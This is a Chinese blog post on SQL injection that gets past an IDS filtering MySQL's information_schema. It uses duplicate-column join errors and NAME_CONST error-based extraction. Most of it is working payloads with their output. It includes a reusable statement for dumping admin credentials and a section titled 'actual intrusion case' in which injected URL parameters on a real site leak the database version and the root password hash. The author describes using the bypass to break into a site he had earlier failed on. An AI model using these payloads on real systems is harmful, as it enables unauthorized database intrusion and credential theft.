原文:绕过IDS过滤information_schema继续注入
//利用MySQL出错爆出字段
mysql> SELECT * FROM (SELECT * FROM user A JOIN user B) C;
ERROR 1060 (42S21): Duplicate column name ‘Host’
mysql> SELECT * FROM (SELECT * FROM user A JOIN user B USING (Host)) C;
ERROR 1060 (42S21): Duplicate column name ‘User’
mysql> SELECT * FROM (SELECT * FROM user A JOIN user B USING (Host,User)) C;
ERROR 1060 (42S21): Duplicate column name ‘Password’
…..
//得到信息
//可能是版本问题,我测试没能成功
mysql> SELECT NAME_CONST((SELECT Host FROM user LIMIT 0,1),0);
ERROR 1210 (HY000): Incorrect arguments to NAME_CONST
好像是NAME_CONST的参数必须为CONST还是怎么了,悲剧。
下次再好好测试一下。
Update:确实是版本的问题(高版本要求参数全为const,否则报错),这方法的通用性看来不是很好。
mysql> SELECT version();
+———————+
| version() |
+———————+
| 5.0.27-community-nt |
+———————+
1 row in set (0.00 sec)
mysql> SELECT NAME_CONST((SELECT user()),0);
+—————-+
| root@localhost |
+—————-+
| 0 |
+—————-+
1 row in set (0.00 sec)
————————————-
mysql> SELECT version();
+——————+
| version() |
+——————+
| 5.1.35-community |
+——————+
1 row in set (0.00 sec)
mysql> SELECT NAME_CONST((SELECT version()),0);
ERROR 1210 (HY000): Incorrect arguments to NAME_CONST
原来做渗透的时候,遇到过一个站,IDS过滤了information_schema,导致后来我没有搞定,前天看文章,发现一个绕过的方法,本地 测试了下,也和月牛讨论了下,最后在月牛的帮助下,把语句都构造好了,原来那个点,回去再看,也就搞定了,后来被当哥把方法给放出来了,那就公布吧。
1.本地构造测试表
mysql> create table users(id int,name varchar(20),passwd varchar(32));
Query OK, 0 rows affected (0.04 sec)
mysql> insert into users value(1,’mickey’,’827ccb0eea8a706c4c34a16891f84e7b’);
Query OK, 1 row affected (0.00 sec)
mysql> create table news(is_admin int(1),id int(2),title varchar(100),date date);
Query OK, 0 rows affected (0.00 sec)
mysql> insert into news values(1,1,’hello,mickey’,now());
Query OK, 1 row affected, 1 warning (0.00 sec)
2.暴列名
mysql> select * from (select * from users as a join news as b) as c;
ERROR 1060 (42S21): Duplicate column name ‘id’
mysql> select * from (select * from users a join users b using(id)) c;
ERROR 1060 (42S21): Duplicate column name ‘name’
mysql> select * from (select * from users a join users b using(id,name)) c;
ERROR 1060 (42S21): Duplicate column name ‘passwd’
mysql> select * from (select * from users a join users b using(id,name,passwd)) c;
+——+——–+———————————-+
| id | name | passwd |
+——+——–+———————————-+
| 1 | mickey | 827ccb0eea8a706c4c34a16891f84e7b |
+——+——–+———————————-+
1 row in set (0.00 sec)
mysql> select * from (select * from news a join news b using(id)) as c;
ERROR 1060 (42S21): Duplicate column name ‘is_admin’
mysql> select * from (select * from news a join news b using(id,is_admin)) as c;
ERROR 1060 (42S21): Duplicate column name ‘title’
mysql> select * from (select * from news a join news b using(id,is_admin,title)) as c;
ERROR 1060 (42S21): Duplicate column name ‘date’
mysql> select * from (select * from news a join news b using(id,is_admin,title,date)) as c;
+———-+——+————–+————+
| is_admin | id | title | date |
+———-+——+————–+————+
| 1 | 1 | hello,mickey | 2010-05-08 |
+———-+——+————–+————+
1 row in set (0.00 sec)
3.暴字段值 (这个语句是月牛想出来的)
研究出来的暴制语句
select * from cms_votes where vid=1 and exists
(select * from (select * from (select name_const((select group_concat(concat(uid,0x7c,pwd)) from admin)
,’fuck’)) a join (select name_const((select group_concat(concat(uid,0x7c,pwd)) from admin),’fuck’)) b)c);
运用:
mysql> select * from cms_votes where vid=1 and exists
(select * from (select * from (select name_const(
(select group_concat(concat(uid,0x7c,pwd)) from admin),’fuck’)) a
join (select name_const((select group_concat(concat(uid,0x7c,pwd)) fromadmin),
‘fuck’)) b)c);
ERROR 1060 (42S21): Duplicate column name ‘ylbhz|fuck,mickey|fucked’
mysql>
mysql> select * from cms_votes where vid=1 and exists
(select * from (select * from (select name_const(@@version,0))
a join (select name_const(@@version,0)) b)c);
ERROR 1060 (42S21): Duplicate column name ’5.0.45-community-nt’
4.实际入侵案例
&cid=261+and+exists(select*from+(select*from(select+name_const(@@version,0))a+
join+(select+name_const(@@version,0))b)c)
Error:Duplicate column name ‘5.0.27-community-nt’Error:Duplicate column name ‘5.0.27-community-nt’
sid=19&cid=261+and+exists(select*from+(select*from(
select+name_const((select+concat(user,password)+from+mysql.user+limit+0,1),0))a+join+
(select+name_const((select+concat(user,password)+from+mysql.user+limit+0,1),0))b)c)
Error:Duplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′
Error:Duplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′
最后多谢月牛的指导与讨论。